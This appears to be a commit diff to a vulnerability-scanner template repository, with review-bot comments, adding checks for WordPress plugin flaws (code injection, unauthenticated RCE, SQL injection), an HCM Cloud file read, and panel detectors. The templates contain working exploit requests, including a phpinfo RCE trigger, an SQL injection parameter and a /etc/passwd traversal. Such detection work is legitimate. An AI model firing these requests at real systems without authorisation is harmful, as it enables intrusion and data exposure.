+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: CVE-2024-9061
+ cwe-id: CWE-94
+ epss-score: 0.00046
+ epss-percentile: 0.18015
+ metadata:
+ max-request: 2
+ verified: true
+ vendor: themehunk
+ product: wp-popup-builder
+ framework: wordpress
+ fofa-query: body="/wp-content/plugins/wp-popup-builder/"
+ tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "/wp-content/plugins/wp-popup-builder")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'len(body) == 13'
+ - 'contains(body, "CVE-2024-9061")'
+ - 'contains(content_type, "text/html")'
+ - 'status_code == 200'
+ condition: and
+# digest: 4b0a00483046022100f80fec38e7c5f649695bac35530600b4fbfa1daa9782d746571908c193ec333d022100f9b434ac3748d54c493f2ad2d7bf045e53c97e1abd079858c054b0ce2f03e0e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-9593.yaml b/http/cves/2024/CVE-2024-9593.yaml
new file mode 100644
index 0000000000..5d95f14137
--- /dev/null
+++ b/http/cves/2024/CVE-2024-9593.yaml
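Review bot: `flow: http(1) && http(2)` makes the check conditional on the home page containing `/wp-content/plugins/wp-popup-builder`, so a site that has the plugin active but does not load its assets on `/` is reported as unaffected without the AJAX request ever being sent; CVE-2024-9593.yaml in this commit gates on `/wp-content/plugins/time-clock` in the same way. The description should state that a clean result only covers sites exposing the plugin path on the front page, or the first step should add a second fingerprint such as the plugin's own `readme.txt`. The `description` also opens with a doubled word, "The The WP Popup Builder".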
@@ -0,0 +1,72 @@
+id: CVE-2024-9593
+
+info:
+ name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
+ author: s4e-io
+ severity: high
+ description: |
+ The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-9593
+ - https://github.com/RandomRobbieBF/CVE-2024-9593
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cve-id: CVE-2024-9593
+ cwe-id: CWE-94
+ epss-score: 0.00052
+ epss-percentile: 0.21567
+ metadata:
+ max-request: 2
+ verified: true
+ vendor: scott_paterson
+ product: time-clock & time-clock-pro
+ framework: wordpress
+ fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
+ tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "/wp-content/plugins/time-clock")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ function=phpinfo
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '>PHP Version <\/td>([0-9.]+)'
+# digest: 
4a0a00473045022065893bee95b4cb863eb698bc33aef1849b6971633dc55d38e63de16d89b20d8e022100916a86a5a8ba50bef07761ba790afe74cf0ab95d95dfc115f03e95f72a607648:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-9796.yaml b/http/cves/2024/CVE-2024-9796.yaml
new file mode 100644
index 0000000000..7f6208b392
--- /dev/null
+++ b/http/cves/2024/CVE-2024-9796.yaml
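Review bot: In CVE-2024-9593.yaml the extractor pattern `'>PHP Version <\/td>([0-9.]+)'` expects the version digits directly after the closing `</td>`, but phpinfo() output normally puts the value in a cell of its own, so as printed the extractor would return nothing even when both matchers fire. Unless the cell markup was simply lost when this page was rendered, the pattern should include it: `- '>PHP Version <\/td><td class="v">([0-9.]+)'`. A positive result also means the stored response holds the full phpinfo() page, which can contain environment variables and paths, so saved scan output for this template should be treated as sensitive. Separately, `product: time-clock & time-clock-pro` puts two products into one metadata field, which makes product-based filtering unreliable.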
@@ -0,0 +1,51 @@
+id: CVE-2024-9796
+
+info:
+ name: WordPress WP-Advanced-Search <= 3.3.9 - SQL Injection
+ author: s4e-io
+ severity: critical
+ description: |
+ The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/
+ - https://github.com/RandomRobbieBF/CVE-2024-9796
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-9796
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-9796
+ cwe-id: CWE-89
+ epss-score: 0.00106
+ epss-percentile: 0.44161
+ metadata:
+ max-request: 1
+ verified: true
+ vendor: mathieu_chartier
+ product: wp-advanced-search
+ framework: wordpress
+ fofa-query: body="/wp-content/plugins/wp-advanced-search/"
+ tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-advanced-search
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "Table '([a-zA-Z0-9_]+)\\.wp_users' doesn't exist"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ name: database_name
+ regex:
+ - "([a-zA-Z0-9_]+)\\.wp_users"
+# digest: 4a0a0047304502204d1fa41448e33d7bdc708a0c0cfefcb5cb74c19e863fdd219d62933fbfed9427022100979820fcbf072d12baefa23aca5ee99edaac434379017e9b00feb2abab3de987:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
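Review bot: In CVE-2024-9796.yaml the extractor is named `database_name` but has no `group: 1`, so it reports the whole match (`<db>.wp_users`) rather than the database name; adding `group: 1` below `name: database_name` fixes that. Both patterns also restrict the schema name to `[a-zA-Z0-9_]+`, while MySQL database names may contain hyphens, so an affected site whose database is called `my-site` (constructed example) would be missed; `"Table '([^'.]+)\\.wp_users' doesn't exist"` in the matcher accepts those. The match depends on the server printing database errors in the response, so a negative result does not show that the plugin is patched, and the description should say so.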
diff --git a/http/exposed-panels/1password-scim-panel.yaml b/http/exposed-panels/1password-scim-panel.yaml
new file mode 100644
index 0000000000..d971b8a591
--- /dev/null
+++ b/http/exposed-panels/1password-scim-panel.yaml
@@ -0,0 +1,30 @@
+id: 1password-scim-panel
+
+info:
+ name: 1Password SCIM Bridge - Panel
+ author: Splint3r7
+ severity: info
+ description: |
+ 1Password SCIM Bridge Login was detected.
+ classification:
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ shodan-query: http.title:"1Password SCIM Bridge Login"
+ tags: panel,1password,login,detect
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_any(body, "1Password SCIM Bridge Login", "scim-bridge-logo")'
+ - 'status_code == 200'
+ condition: and
+# digest: 4a0a004730450220273efa2c962c1449fec38b3d098131d1a6662c122f71a2546cf4457f462e2fc5022100ec141b841154859bb27c6ad26e87c9a5e934fdf5ad1f71da7d12216d506c96ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/reolink-panel.yaml b/http/exposed-panels/reolink-panel.yaml
new file mode 100644
index 0000000000..f7ecfc6408
--- /dev/null
+++ b/http/exposed-panels/reolink-panel.yaml
@@ -0,0 +1,30 @@
+id: reolink-panel
+
+info:
+ name: Reolink Panel - Detect
+ author: s4e-io
+ severity: info
+ description: |
+ Reolink panel was discovered.
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: "Reolink"
+ shodan-query: title:"Reolink"
+ tags: panel,login,reolink,detect
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "Reolink")'
+ - 'status_code == 200'
+ condition: and
+# digest: 4b0a00483046022100972074f41e35ce0c2c5e9c66f417208fe38d99127faac925683889cbe52c9700022100dbb2f66c6e5448bfa41dce0ecae14894006d99baa678514d395d2db8acbf344f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
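Review bot: In reolink-panel.yaml the only content check is `contains(body, "Reolink")`, which is true for any 200 page that mentions the brand (a reseller shop, a support forum), so the template will report panels that are not there. The Shodan query in the same file keys on the page title, and the matcher could do the same, for example `- 'regex("(?i)<title>[^<]*reolink", body)'`, with the exact title string confirmed against a real device. An asset inventory built from this template should not be trusted for Reolink exposure until the matcher is tied to something panel-specific.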
diff --git a/http/vulnerabilities/hcm/hcm-cloud-lfi.yaml b/http/vulnerabilities/hcm/hcm-cloud-lfi.yaml
new file mode 100644
index 0000000000..4522d46342
--- /dev/null
+++ b/http/vulnerabilities/hcm/hcm-cloud-lfi.yaml
@@ -0,0 +1,30 @@
+id: hcm-cloud-lfi
+
+info:
+ name: HCM Cloud - Arbitrary File Read
+ author: s4e-io
+ severity: high
+ description: |
+ HCM-Cloud professional human resources platform in the cloud download Arbitrary file read vulnerability.
+ reference:
+ - https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw
+ - https://github.com/wy876/POC/blob/main/%E6%B5%AA%E6%BD%AE%E4%BA%91/HCM-Cloud%E4%BA%91%E7%AB%AF%E4%B8%93%E4%B8%9A%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E5%B9%B3%E5%8F%B0download%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="-859381597"
+ tags: hcm-cloud,lfi,hcm
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/model_report/file/download?index=/&ext=/etc/passwd"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "regex('root:.*:0:0:', body)"
+ - 'contains(content_type, "application/octet-stream")'
+ - "status_code == 200"
+ condition: and
+# digest: 4a0a00473045022026d56dc5db7d021f9588ce83480002e6e15ec8a5b9d2247a75272f80ddc3e6d302210090d0666fb6a8b8fa1f467c96c1103565befbdbfda3b88aa72ab7266ae13f84e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 4bf3f883bb..10bcf77018 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
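Review bot: In hcm-cloud-lfi.yaml the `info` block has no `classification`, unlike the CVE templates in this commit, so findings from it cannot be grouped or reported by weakness class. For an arbitrary file read, the usual addition under `info` is `classification:` with `cwe-id: CWE-22`; the hunk gives no CVSS vector, so none should be guessed. There is also no `remediation`, and the matcher keys on `/etc/passwd` content, so it confirms the issue only on Unix-like hosts; the description should say so, so that a clean result on another platform is not read as "not vulnerable".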
@@ -29,6 +29,10 @@ cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:3a67a177c3537b361b26b549a cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:660261dce36382f203ec7e16e01d2e29f9bf7836 cloud/aws/cloudwatch/cw-alarm-action-set.yaml:b02b7e970b71be76717b5fc7e132b23adb5048e0 cloud/aws/cloudwatch/cw-alarms-actions.yaml:f0198d619bebd6afa41568d0c8c9bac456261021 +cloud/aws/dms/dms-multi-az.yaml:cb3e1113188a1770d764c97a19ea3d608a3ff718 +cloud/aws/dms/dms-public-access.yaml:e8eee10542c4723e8cec23eb25eaa536f8ba4fbd +cloud/aws/dms/dms-version-upgrade.yaml:969893df5f59cb6d06ce7e156028baa3a23682b0 +cloud/aws/ebs/ebs-encryption-disabled.yaml:c7ccebdd432abae71c809226591cf9ace3cacad3 cloud/aws/ec2/ec2-imdsv2.yaml:bb7909c4b9b433dd90c343b3a03122f9c5c310a0 cloud/aws/ec2/ec2-public-ip.yaml:5fb5ee7dd9d51781a4a2903a0cb05b21fa586f85 cloud/aws/ec2/ec2-sg-egress-open.yaml:047f551aa108926349f69ba8d47189d88b7aab01 @@ -54,6 +58,8 @@ cloud/aws/ec2/ec2-unrestricted-ssh.yaml:92a1200da475f085c33d0f86edd3077ba19eea33 cloud/aws/ec2/ec2-unrestricted-telnet.yaml:d7f80cec0723d2723300c078552824ec1a8b641a cloud/aws/ec2/publicly-shared-ami.yaml:49e3f4939b9991f5ac9db99fbb7f7caba021227d cloud/aws/ec2/unencrypted-aws-ami.yaml:35fc4a61e70120df3aafba92b4153ffa5b8c92b6 +cloud/aws/firehose/firehose-server-destination-encryption.yaml:8d734f21761ffb41988d3d216b7e9f7aa7bd5f48 +cloud/aws/firehose/firehose-server-side-encryption.yaml:5e78f1b9a1d2eeb44b87f9af6d9699a493b4e80a cloud/aws/iam/iam-access-analyzer.yaml:f50b212fc028372e3aeba52e43c0417c845a01a9 cloud/aws/iam/iam-expired-ssl.yaml:a2ec4618352430440ddb4d7704058a4c7507d3f8 cloud/aws/iam/iam-full-admin-privileges.yaml:ab5d0948a725aa5a9a1059d6b7c0ae9f5d846d06 
@@ -419,8 +425,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:74b3e1af12d1f57440d4bbd006dacf6eda56785a -cves.json:1f9c64298a7fdb69876fad1267c4671f73a5a024 -cves.json-checksum.txt:b7786a85233a460e34b9cd4fb0f0b8d7d9290e4f +cves.json:d801cb10fa8d00e27a3846145d6634c66bafccf8 +cves.json-checksum.txt:4143244c4fec9f8bedb78c0ceb14a368b532782c dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3672,6 +3678,7 @@ http/cves/2023/CVE-2023-6909.yaml:49445ba4c9f3657098a5b90e0139e370ad4b0e22 http/cves/2023/CVE-2023-6977.yaml:92c599645f0079a1292d86ff4c56dddc787b5818 http/cves/2023/CVE-2023-6989.yaml:f42110a36f2bf7b8c62a72a752a69c8db52480c5 http/cves/2023/CVE-2023-7028.yaml:0ce7fc4083aa99ba9c914582ed064b84b50d22a2 +http/cves/2024/CVE-2016-9299.yaml:9d44b30c8d0646f6e537110619b64cea85d33025 http/cves/2024/CVE-2024-0195.yaml:091e10588a00fadab2e1e67d7ce5f8d286e7d3d2 http/cves/2024/CVE-2024-0200.yaml:aaa2f2a6703a042cdff54922d03d08e7f649a3ad http/cves/2024/CVE-2024-0204.yaml:a5dd990f0b300285f5d71eb7300852fc580c358a 
@@ -3873,7 +3880,7 @@ http/cves/2024/CVE-2024-4885.yaml:4ed235e0b33138d6382df49594465c551a54c788 http/cves/2024/CVE-2024-48914.yaml:b27547a769516a91b02ffd72ac8f8ce32da86482 http/cves/2024/CVE-2024-4940.yaml:5ce4ed65bd103d8a7791414015bb8cf507885305 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a -http/cves/2024/CVE-2024-49757.yaml:249c629be1603354f68060f37cf6398221f30222 +http/cves/2024/CVE-2024-49757.yaml:5a48ed3ba12227bae818ea35a200145217b35d3f http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5217.yaml:4fadf394def4c4b705871b805aced6715c7a2a06 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c @@ -3940,10 +3947,13 @@ http/cves/2024/CVE-2024-8752.yaml:f0f9dca783b57c1fd5e47592e224f888d47c1747 http/cves/2024/CVE-2024-8877.yaml:d5b12c9a0e91fabea84efd078485f4fd57703738 http/cves/2024/CVE-2024-8883.yaml:e02b12d824d8f4df3edd0ee981eb0284215409dd http/cves/2024/CVE-2024-9014.yaml:ea54c9f07357a92fb915794e7be909d11545753f +http/cves/2024/CVE-2024-9061.yaml:9c44d7fb4a27fd9f40a791d617b7e21981772b70 http/cves/2024/CVE-2024-9234.yaml:b8d98cd3fce5725e967dfb1c4cc22b4eefcbcd7c http/cves/2024/CVE-2024-9463.yaml:80dc0d8f82b6d69a77dbdbfcc20988bbcfbc83f1 http/cves/2024/CVE-2024-9465.yaml:cc95c8e163ea7ba487f5a09bddc953485559de1c +http/cves/2024/CVE-2024-9593.yaml:b5592584dd80c8cd4e33f192f0142a28e11ce557 http/cves/2024/CVE-2024-9617.yaml:7cb4fee2a032853c8bdab68ab3ab8fad718c3a23 +http/cves/2024/CVE-2024-9796.yaml:63320eed168e12210192edea9a986bee738d4ae5 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda 
@@ -4167,6 +4177,7 @@ http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287 http/default-logins/zabbix/zabbix-default-login.yaml:039c6303b088546c9f54e85481d65de7927262e4 http/default-logins/zebra/zebra-printer-default-login.yaml:e8e3085df0ca4f9062f0c10855e1c1b6908ec189 http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17 +http/exposed-panels/1password-scim-panel.yaml:65a0e1ff296b07247ef0292119dc45de6332f9df http/exposed-panels/3cx-phone-management-panel.yaml:e7a814bb90b5ad57f2e4e643f7a87496a92dad8e http/exposed-panels/3cx-phone-webclient-management-panel.yaml:e0c9fdfc6a9ea4d1daece9ef526d481f672b4a6a http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cca5984 @@ -4866,7 +4877,7 @@ http/exposed-panels/ollama-llm-panel.yaml:d03925e708d955ad60baf6e1114cae81bbc0c2 http/exposed-panels/olt-web-interface.yaml:bd13acc8c195cbf26aa41fe65aa499740e6332e4 http/exposed-panels/olympic-panel.yaml:858b214bfbb07e460ff29ba93cada9e90b22cef6 http/exposed-panels/omniampx-panel.yaml:56105e601d3cc844fb99879aa995176faac92dcf -http/exposed-panels/onedev-panel.yaml:778521f437f02b656bcb661a0799a2974d43ea55 +http/exposed-panels/onedev-panel.yaml:6aec846d56b8cb5b0aceddf0267a858c53c7cc90 http/exposed-panels/onlyoffice-login-panel.yaml:044f6d420976bc9f2a4063cfe33d22ab3b4ea351 http/exposed-panels/open-game-panel.yaml:59efeff7e08a70e689ab77521a82be8e41709028 http/exposed-panels/open-stack-dashboard-login.yaml:68ffbeb500d7df7d11de2f399d5579983e714ef7 
@@ -5015,6 +5026,7 @@ http/exposed-panels/regify-panel.yaml:7af46ff8dbd0743a178b02b1c8ce2c2206ec5ae5 http/exposed-panels/remedy-axis-login.yaml:b676bbce4e0ea774bff50f84e9bce159c790ca6f http/exposed-panels/remkon-manager-panel.yaml:7aaca85bb4d742edb3cafe770445522d2ff3b31d http/exposed-panels/remote-ui-login.yaml:0335d3e84ec1b5927b4e71e30de2fcacd40a33c3 +http/exposed-panels/reolink-panel.yaml:3608e84b6525ab89f7b9a809e5e4ff9330e850fc http/exposed-panels/repetier-server-panel.yaml:6b57a80bb46f006aa09fa69262e84ead2ba276c0 http/exposed-panels/reportico-admin-panel.yaml:a456a00c6ced7e1c1096511440e45372e017a0b8 http/exposed-panels/residential-gateway-login.yaml:6245630106f122c0ed93fcc79e8ee754e90b2bbc @@ -8479,6 +8491,7 @@ http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:6c4f889193935b21ef25bdb52479408 http/vulnerabilities/gradio/gradio-lfi.yaml:34910ba1e5d2d62b9415ff89e9632e0a97198745 http/vulnerabilities/gradio/gradio-ssrf.yaml:c81b4d852de367dd51aa3c7a60a11672e92da709 http/vulnerabilities/grafana/grafana-file-read.yaml:953afdafb26e334177fd5a29c88434674d13b6e2 +http/vulnerabilities/hcm/hcm-cloud-lfi.yaml:fb9dd54d8b49f84fc193bada0f5a4de09f7864b7 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:d4a5f3853a70adea141b8d68ee9a7c2d6ef44545 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 
@@ -9539,7 +9552,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cce82f1b617c661f4ecb3a3b9b70f4aef6ecd42f +templates-checksum.txt:b3593609a5c788fe4bf0ad23ac7b9030d7031bb4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4